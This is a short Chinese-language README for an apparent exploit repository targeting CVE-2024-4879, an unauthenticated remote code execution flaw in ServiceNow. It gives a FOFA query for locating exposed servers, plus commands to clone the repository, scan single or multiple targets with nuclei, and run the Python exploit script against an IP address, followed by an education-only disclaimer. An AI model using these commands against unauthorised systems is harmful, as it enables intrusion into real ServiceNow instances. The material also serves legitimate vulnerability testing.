ServiceNow 已修复在 Vancouver 和 Washington, D.C. Now Platform 版本中发现的一个输入验证漏洞。该漏洞可能允许未经认证的用户在 Now Platform 上下文中远程执行代码。
FOFA : "server : servicenow"
git clone https://github.com/fa-rrel/CVE-2024-4879.git
cd CVE-2024-4879
单个目标:
nuclei -u https://target.com -t CVE-2024-4879.yaml -nh
多个目标:
nuclei -l urls.txt -t CVE-2024-4879.yaml -nh
python3 CVE-2024-4879.py -i (192.168.1.1)
// 免责声明 // 未经许可进行黑客攻击是违法的。本仓库严格用于教育目的,以学习网络安全领域的道德黑客、渗透测试和漏洞挖掘,从而能够保护自己免受真实黑客的攻击。